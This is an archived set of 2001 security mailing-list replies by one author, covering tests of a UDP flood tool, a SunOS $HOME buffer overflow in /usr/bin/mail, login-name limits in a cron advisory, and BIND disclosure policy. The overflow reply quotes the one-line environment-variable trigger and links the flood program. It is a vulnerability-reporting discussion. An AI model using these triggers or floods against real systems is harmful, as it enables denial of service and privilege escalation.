Re: UDP packet handling weird behaviour of various operating systems

2001-07-27 Thread Juergen P. Meier

 http://rootshell.com/archive-j457nxiqi3gq59dv/199803/biffit.c
 
 1. Linux 2.4.7 UP (pristine source, waiting for a new shiny Alan Cox patch) 
   - system gets frozen after 3 seconds of flood on a gigabit link.
 Same result at a 100Mbps. The top utility shows (at least as long as it can)
 that system(kernel) gets 100% of the CPU in its march to death. Same for
 Linux kernel 2.2.19.

2.4.6 (modular, unpatched, selfcompiled) on an old P133:

biffit against loopback: 99% cpu(system), no slowdown, system
responds normaly. (no slowdown)
biffit against eth0: same effect. (doh, cause linux sends it over loopback)

Biffit from a PIII/600 FDX 100mbit connected: same as above.

in the later case: my ssh connection to that system (going through the
same nic that was target) became a bit sluggish. Console access showed no
impact.

It obviously just consumes idle time. Interupt load was not very high.
(ping -f is much worse for interrupts)

Hardware:

Board: ASUS p55tp4n (Intel FX chipset)
CPU: P133 (with F00F bug)
RAM: 64mb
eth0: RealTek RTL8139 Fast Ethernet at 0xc480b000, 00:00:cb:11:22:33, IRQ 11
eth0:  Identified 8139 chip type 'RTL-8139C'
(nothing else on IRQ11)
running squid, a webserver, 3 ssh connections, and having several iptables
rules (those udp packets matched ACCEPT-rule #2 (loopback case) and rule #4
on input chain)

no SMP.
 
 I would like to hear some other results for other operating systems.

Windows 98 (running on the P3/600):
25% load. no side effects

Juergen 
-- 
Juergen P. Meier



Re: $HOME buffer overflow in SunOS 5.8 x86

2001-06-05 Thread Juergen P. Meier

On Mon, Jun 04, 2001 at 06:14:30PM +0300, Georgi Guninski wrote:
 $HOME buffer overflow in SunOS 5.8 x86
 Systems affected:
 SunOS 5.8 x86 have not tested on other OSes
 Risk: Medium
 Date: 4 June 2001
 
 Details:
 HOME=`perl -e 'print Ax1100'` ; export HOME
 mail a
 CTL-C
 eip gets smashed with 0x41414141.

0:jpmeier@sol:~ HOME=`perl -e 'print Ax1100'` ; export HOME
0:jpmeier@sol:/home/jpmeier mail a
^Cmail: Mail saved in dead.letter
1:jpmeier@sol:/home/jpmeier uname -a
SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10

also tried larger buffers.

Solaris/sparc appears not vulnerable. Maybe its an x86 bug only
 
 Workaround:
 chmod -s /usr/bin/mail
 Vendor status:
 Sun was informed on 29 May 2001 about /usr/bin/mail and shall release patches.

juergen

-- 
Juergen P. Meieremail: [EMAIL PROTECTED]



Re: vixie cron possible local root compromise

2001-02-15 Thread Juergen P. Meier

On Wed, Feb 14, 2001 at 11:34:02AM -0500, Valdis Kletnieks wrote:
 Of course, what's important isn't what wtmpx.h defines it as, but what pwd.h
 has to say about it.  If getpwent() won't handle it, your wtmp format doesn't
 matter...

 Note also that some systems have utmpx.h not wtmpx.h

  If anyone can find any system that reports less then 32, it will be an exce=
  ption
  of the rule. Of course I mean current systems. libc5 systems, AIX 3.2 and o=
  ld
  systems like that will probably return 16 or even 8.

 AIX 4.3.3 and AIX 5.0 both limit it to 8 in utmpx.h

 Solaris 5.7 has a 32-char limit in wtmp, but has this in 'man useradd':

Years of wrestling a big NIS+ cluster with sun's and linux systems
teached me that one should _never_ ever completly trust anything thats just
written the manual (pages) - its always better to check with the
source (or at least the header's) - and check portability before anything
else ;)

Btw, the file-db routines in solaris (in solaris 2.4 through 2.6,
dont know what 7 and 8 make of it) lib's do handle login names of up to
32 chars well. Its just that NIS+ is horribly broken when it comes
to long login names (and passwords, btw ;).
One does also run into big problems with all login-type daemons like
ftp, rsh etc.

Just a side note: in /usr/include/limits.h one can find this:

(sol 2.6, 7 and 8)
#define LOGNAME_MAX 8   /* max # of characters in a login name */
/* POSIX.1c conformant */
#define _POSIX_LOGIN_NAME_MAX   9

Thats one reason why i used to include limits.h in my programs ;)


 Moral of the story:  Not all the world is Linux, and some vendors care
 more about backward and cross compatability than being the latest-and-greatest.

ACK

 --
   Valdis Kletnieks
   Operating Systems Analyst
   Virginia Tech


Juergen

--
Juergen P. Meieremail: [EMAIL PROTECTED]



Re: Defending the (supposedly) indefensible...

2001-02-03 Thread Juergen P. Meier

On Fri, Feb 02, 2001 at 02:14:58PM -0500, Phil Scarr wrote:
 While there has been a lot of hyperbole strewn about on this topic, I
 figured I'd go out on a very long, slender limb and agree with the
 stated purpose of this new conspiracy/cabal/clique/whatever.

well, not that long - the ISC's arguments are quite valid, even if i
disagree with their plans.

 I agree that TLDs should have early access to security related issues.
 I can also make the same argument for vendors who ship bind as part of
 their offerings, especially OS vendors like Sun, HP and IBM.

What ever ISC does, those vital parts of the ineternet infrastructure
should always get those informations immediatly, with as little delay
as humanly and technically possible.

 While most people who read this list are quite happy to go to ISC and
 fetch the most recent code at the announcement of a bug, there are
 *literally millions* of people who rely on the vendor to ship them an
 updated version so they can pkgadd/swinstall/rpm it into place.  They
 don't have the interest/skills/whatever necessary to maintain their own
 versions of utilities they get from their vendor.  To them, named is
 *part of the OS*, not something you hack into place by typing
 make/configure/whatever.

sad but true.

 Is it fair to them to delay a timely response from their vendor (who
 are, by the nature of the size and scope of their operations, slower
 than glaciers at releasing fixes) when that vendor could (and should)
 have advance notice of a security flaw for which there are no known
 exploits in the real world?  Sure, we can argue that vendors *should* be
 faster, but that doesn't get the work done.

Ah, here i think you (and the ISC) overlooked something:
Although i believe the probability of having a blackhat among
the root-nameserver maintainers is close to zero, i am convinced
that the probability of blackhats among all those people who would
recieve such a closed-reciepent-list security-bulletin among the
big vendors (IBM, Sun, HP and them linux distributors) is much
closer to one.

I fear that if the ISC really does make this pre-announcement
reality, we will have a Situation where the bad guys will get
those security-warnings at the same time as the root-ns, TLD maintainers
and vendors,  and have even more time to develop and _use_ exploits
before we even know that there is a hole.

Well, it seems that "Obscurity != Security" does apply here too.

The ISC should take this into account, and weight it against
their arguments.

 Flame away!

love to ;)

 ;-)

   -Phil

juergen

--
Juergen P. Meieremail: [EMAIL PROTECTED]